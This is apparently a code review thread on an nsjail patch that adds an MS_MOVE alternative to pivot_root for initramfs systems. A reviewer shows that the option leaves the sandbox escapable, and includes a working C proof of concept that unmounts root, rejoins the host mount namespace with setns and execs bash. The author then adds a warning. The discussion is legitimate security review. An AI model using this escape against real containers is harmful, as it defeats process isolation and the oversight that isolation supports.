mnt.cc

```diff
@@ -398,30 +398,61 @@ static bool initCloneNs(nsjconf_t* nsjconf) {
 		PLOG_E("umount2('%s', MNT_DETACH)", tmpdir->c_str());
 		return false;
 	}
-	/*
-	 * This requires some explanation: It's actually possible to pivot_root('/', '/').
-	 * After this operation has been completed, the old root is mounted over the new
-	 * root, and it's OK to simply umount('/') now, and to have new_root as '/'. This
-	 * allows us not care about providing any special directory for old_root, which is
-	 * sometimes not easy, given that e.g. /tmp might not always be present inside
-	 * new_root
-	 */
-	if (util::syscall(
-		__NR_pivot_root, (uintptr_t)destdir->c_str(), (uintptr_t)destdir->c_str()) == -1) {
-		PLOG_E("pivot_root('%s', '%s')", destdir->c_str(), destdir->c_str());
-		return false;
-	}
-
-	if (umount2("/", MNT_DETACH) == -1) {
-		PLOG_E("umount2('/', MNT_DETACH)");
-		return false;
-	}
-
-	for (const auto& p : nsjconf->mountpts) {
-		if (!remountPt(p) && p.is_mandatory) {
-			return false;
-		}
-	}
+	
+    if (false == nsjconf->use_switchroot) {
+        /*
+        * This requires some explanation: It's actually possible to pivot_root('/', '/').
+        * After this operation has been completed, the old root is mounted over the new
+        * root, and it's OK to simply umount('/') now, and to have new_root as '/'. This
+        * allows us not care about providing any special directory for old_root, which is
+        * sometimes not easy, given that e.g. /tmp might not always be present inside
+        * new_root
+        */
+        if (util::syscall(
+            __NR_pivot_root, (uintptr_t)destdir->c_str(), (uintptr_t)destdir->c_str()) == -1) {
+            PLOG_E("pivot_root('%s', '%s')", destdir->c_str(), destdir->c_str());
+            return false;
+        }
+
+        if (umount2("/", MNT_DETACH) == -1) {
+            PLOG_E("umount2('/', MNT_DETACH)");
+            return false;
+        }
+    } else {
+        /*
+        * pivot_root would normally un-mount the old root, however in certain cases this
+        * operation is forbidden. There are systems (mainly embedded) that keep their root
+        * file system in RAM, when initially loaded by the kernel (e.g. initramfs),
+        * and there is no other file system that is mounted on top of it.In such systems,
+        * there is option to pivot_root!
+        * For more information, see kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt.
+        * switch_root alternative:
+        * Innstead of un-mounting the old rootfs, it is over mounted by moving the new root to it.
+        * This way, we prevent the process from hacking its way back into the old root. 
+        */
+        if (chdir(destdir->c_str()) == -1) {
+            PLOG_E("chdir('%s')", destdir->c_str());
+            return false;
+        }
+
+        /* mount moving the new root on top of '/'. This operation is atomic and doesn't involve
+        un-mounting '/' at any stage */
+        if (mount(".", "/", NULL, MS_MOVE, NULL) == -1) {
```

Comment:
this is bypassable if caps are retained in the userns.
Bypass: unmount the moved chroot, setns to rejoin the mnt namespace.
See also: https://unix.stackexchange.com/questions/152029/why-is-there-no-rootfs-file-system-present-on-my-system

Reply:
Thanks for the reference. I wasn't aware of this hack. I did test it and indeed the original root can be exposed with the method you mentioned. While adding a warning message is easy, I tried to find better solution.
This issue is a common issue and I saw that lxc is solving it differently. I pushed this solution to my branch. Ofcourse I've tested it and wasn't able to expose original root.
Do you see any issue with that?

Reply:
This does not change a thing.
Still escapable, just need 2 iterations.

```
#define _GNU_SOURCE
#include <sys/mount.h>
#include <sched.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>

static int pidfd_open(pid_t pid, unsigned int flags)
{
  return syscall(__NR_pidfd_open, pid, flags);
}


int main() {
  int pidfd = pidfd_open(getpid(), 0);
  if (pidfd == -1) {
    perror("pidfd");
    return -1;
  }

  char* argv[] = {"/bin/bash", NULL};

  for (;;) {
    int ret = umount2("/", MNT_DETACH);
    if (ret == -1) {
      perror("umount2");
      return -1;
    }

    ret = setns(pidfd, CLONE_NEWNS);
    if (ret == -1) {
      perror("setns");
      return -1;
    }

    chdir("/");
    chroot(".");
    execv("/bin/bash", argv);
    perror("execve");
  }
}
```

Reply:
indeed.. my bad.

Reply:
So, I followed your suggestion and added a warning when this option is used.
One more thing, I think the option use_switchroot should be changed to no_pivotroot (as other container runtimes), since there is a switch_root utility that performs the same with the addition of freeing the RAM used by old root. In our case we don't want it of course, but the point is that by using the name use_switchroot, I may imply that the old root will be erased and freed.
Does it make sense?

Reply:
Ye, `no_pivotroot` might be a better name.
Otherwise looks good except of few minor formating changes.

Reply:
Done